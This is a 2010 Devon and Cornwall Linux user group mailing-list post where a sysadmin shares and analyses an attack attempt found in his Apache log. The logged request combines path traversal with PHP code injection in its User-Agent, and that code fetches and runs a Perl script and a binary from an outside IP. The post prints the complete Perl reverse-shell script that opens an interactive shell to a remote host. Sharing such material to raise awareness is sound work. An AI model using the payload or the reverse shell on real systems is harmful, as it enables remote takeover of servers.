[ Date Index ] [ Thread Index ] [ <= Previous by date / thread ] [ Next by date / thread => ]

[LUG] PHP, Perl, server securing, etc.

To: Devon/Cornwall GNU LUG <list@xxxxxxxxxxxxx>
Subject: [LUG] PHP, Perl, server securing, etc.
From: Gordon Henderson <gordon+dcglug@xxxxxxxxxx>
Date: Tue, 22 Jun 2010 20:37:15 +0100 (BST)
Delivered-to: dclug@xxxxxxxxxxxxxxxxxxxxx
Distribution: world


And who says Linux isn't targetted by scammers, etc...

I noticed this in a log-file earlier - I see this sort of thing regularly,but thought I'd post one here for you:

94.199.181.165 - - [22/Jun/2010:19:13:20 +0100] "GET/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ%00HTTP/1.1" 404 270 "-" "<?system('cd /var/tmp;wgethttp://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wgethttp://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd/dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.3080;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.3080');?> ;<?exec_shell('cd /var/tmp;wget http://195.239.120.69/cb.txt;perlcb.txt 192.24.5.30 80;wget http://195.239.120.69/cback;chmod +xcback;./cback 192.24.5.30 80;cd /dev/shm;curl -Ohttp://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -Ohttp://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80');?>;<?passthru('cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt192.24.5.30 80;wget http://195.239.120.69/cback;chmod +x cback;./cback192.24.5.30 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perlcb.txt 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +xcback;./cback 192.24.5.30 80');?>;Ustupid MF is Back; Mozilla/4.0(compatible; MSIE 6.0; Windows 98)"

That's an entry from an apache server log-file. Good, eh? I'm not surewhat sort of index.php might respond to that request, however it's tryingto run a program to wget a file, then perl the file.


The perl file it gets, bascially runs this:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";HISTFILE=/dev/null /bin/sh -i';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

which appears to send some basic information to a remote site.

then it fetches 'cback'. This is a binary file - and guess what it'scompiled for:


file cback
  cback: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for
  GNU/Linux 2.0.0, dynamically linked (uses shared libs), stripped

Not going to execute it, but dumping strings from it reveals this:

%s <host> <port>
socket ok
/bin/sh
error: %s
retring in 5 seconds
fork error, retyr in 5 seconds
cannot create socket, retring in 5 seconds
GCC: (GNU) 3.3.3

My guess is that it's sitting there, waiting for commands from a remotesite - to do what? Who knows.

So there you go - Linux *is* being targetted and obvously the target aboveis for some specific site running some specific version of some software,but who knows!




--
The Mailing List for the Devon & Cornwall LUG
http://mailman.dclug.org.uk/listinfo/list
FAQ: http://www.dcglug.org.uk/linux_adm/list-faq.html

Follow-up: Re: [LUG] PHP, Perl, server securing, etc.
- From: Grant Sewell
Follow-up: Re: [LUG] PHP, Perl, server securing, etc.
- From: Aaron Trevena

Prev by Date: Re: [LUG] Spooky coincidence.
Next by Date: Re: [LUG] PHP, Perl, server securing, etc.
Previous by thread: Re: [LUG] Firefox Printing to file
Next by thread: Re: [LUG] PHP, Perl, server securing, etc.
Index(es):
- Date
- Thread